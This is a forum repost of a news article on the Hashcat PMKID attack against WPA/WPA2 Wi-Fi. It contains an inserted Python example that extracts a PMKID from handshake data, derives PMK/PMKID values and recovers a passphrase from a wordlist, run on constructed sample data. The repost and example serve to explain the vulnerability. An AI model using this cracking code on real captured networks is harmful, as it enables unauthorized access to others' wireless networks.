Researchers have accidentally discovered a new attack on the Wi-Fi Protected Access (WPA/WPA2) protocols used in wireless access points that makes it easier for outsiders to capture the material needed to recover a network's access credentials offline.
The new attack captures the Pairwise Master Key Identifier (PMKID), a value the access point itself sends at the start of the handshake, and - according to the Hashcat password recovery utility developers who devised it - works against 802.11i/p/q/r networks with roaming functions enabled, which covers most modern routers.
What is the difference between the new attack and previous WPA/WPA2 cracks?
According to Hashcat developer Jens "Atom" Steube, the most significant difference between older attacks and the newly discovered method is that an attacker no longer needs another user to be on the targeted network in order to capture the data needed for cracking. The only thing required is the initiation of the authentication process with the access point.
The researcher also added that earlier WPA/WPA2 attacks were more challenging to carry out, because "in the past the attacker had to record the WPA four-way handshake to launch an offline attack". This may sound easy, but in practice capturing a complete, usable handshake causes a lot of trouble from a technical perspective.
The new attack is much easier to pull off, because “if you receive the PMKID from the access point, you will be able to get into the network if you can guess the [WPA] pre-shared key (PSK)“.
The success of the attack depends on the length and complexity of the pre-shared key. It should be noted that most users do not know how to change the PSK on their routers and simply keep the manufacturer-generated key, which gives attackers a starting point for guessing it. Cracking such a password becomes even easier when manufacturers generate PSKs following a pattern that can be traced back to the make of the router.
In a nutshell, here’s why this attack is much better than previous techniques:
– No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
– No more waiting for a complete 4-way handshake between the regular user and the AP
– No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
– No more eventual invalid passwords sent by the regular user
– No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
– No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
– No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string
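The following is an added worked example, not code from the original post or from the Hashcat project, showing the offline half of the attack described above: pull the PMKID out of the Key Data field of the first EAPOL-Key message, derive a PMKID from each candidate passphrase (PMK = PBKDF2-HMAC-SHA1 over the passphrase and SSID, PMKID = HMAC-SHA1-128 of "PMK Name" plus the two MAC addresses) and stop when one matches. The SSID, MAC addresses, passphrase, candidate list and the Key Data bytes are all constructed for the demonstration; the `pmkid*mac_ap*mac_sta*ssid` hex line mirrors the plain hex-string output mentioned in the last bullet (hashcat accepts this layout in its mode 16800).

```python
import hashlib
import hmac
from typing import Iterable, Optional

PMKID_LEN = 16
RSN_OUI = bytes.fromhex("000fac")  # IEEE 802.11 RSN OUI used in Key Data Encapsulations (KDEs)
KDE_TYPE_PMKID = 4                 # KDE data type that carries a PMKID


def derive_pmk(psk: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) as in WPA/WPA2-PSK."""
    return hashlib.pbkdf2_hmac("sha1", psk.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:PMKID_LEN]


def extract_pmkid(key_data: bytes) -> Optional[bytes]:
    """Walk the KDEs in the Key Data field of EAPOL-Key message 1 and return the PMKID, if any.

    Each KDE is: type (0xDD) | length | OUI (3 bytes) | data type | data.
    """
    i = 0
    while i + 2 <= len(key_data):
        kde_type, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2 : i + 2 + length]
        if (kde_type == 0xDD and len(body) == 4 + PMKID_LEN
                and body[:3] == RSN_OUI and body[3] == KDE_TYPE_PMKID):
            return body[4:]
        i += 2 + length
    return None


def crack_pmkid(pmkid: bytes, ssid: str, mac_ap: bytes, mac_sta: bytes,
                candidates: Iterable[str]) -> Optional[str]:
    """Offline guess: derive a PMKID per candidate passphrase and compare with the captured one."""
    for psk in candidates:
        if not 8 <= len(psk) <= 63:   # WPA passphrases are 8 to 63 characters
            continue
        if hmac.compare_digest(derive_pmkid(derive_pmk(psk, ssid), mac_ap, mac_sta), pmkid):
            return psk
    return None


def to_hex_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """Plain hex string 'pmkid*mac_ap*mac_sta*ssid_hex', the cracker-friendly output form."""
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


def self_check() -> bool:
    """Known PBKDF2 vector from the 802.11 standard: passphrase 'password', SSID 'IEEE'."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


# --- constructed sample network (not a real capture) ---
SSID = "ExampleNet"
MAC_AP = bytes.fromhex("02aabbccdd01")
MAC_STA = bytes.fromhex("02aabbccdd02")
TRUE_PSK = "correct-horse"


def build_sample_key_data() -> bytes:
    """Constructed Key Data for message 1: a filler vendor KDE followed by the PMKID KDE."""
    pmkid = derive_pmkid(derive_pmk(TRUE_PSK, SSID), MAC_AP, MAC_STA)
    filler_kde = bytes([0xDD, 0x04]) + bytes.fromhex("00112201")          # arbitrary vendor KDE
    pmkid_kde = bytes([0xDD, 4 + PMKID_LEN]) + RSN_OUI + bytes([KDE_TYPE_PMKID]) + pmkid
    return filler_kde + pmkid_kde


if __name__ == "__main__":
    captured = extract_pmkid(build_sample_key_data())
    print("self-check:", self_check())
    print("hex line:", to_hex_line(captured, MAC_AP, MAC_STA, SSID))
    wordlist = ["password", "short", "letmein123", "correct-horse", "qwertyuiop"]  # constructed
    print("recovered PSK:", crack_pmkid(captured, SSID, MAC_AP, MAC_STA, wordlist))
```

Note that nothing in the loop depends on a client: once the AP has handed over message 1, every remaining step runs offline, and the only defence is a passphrase that a wordlist or pattern-based guess will not reach.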
Who is affected?
At this time, the researchers are not sure which vendors or how many routers this technique will work against, but they expect it to work against all 802.11i/p/q/r networks with roaming functions enabled. Put shortly, this means most modern routers.
My post is just a repost from here https://sensorstechforum.com/attack-wpa ... n-routers/
Also more info can be found here https://hashcat.net/forum/thread-7717.html and here https://www.itnews.com.au/news/new-wi-f ... eds-499659
Guess it's time for Mikrotik to try to find out if they are vulnerable and what they can do.
Just another reason we need WPA3 sooner.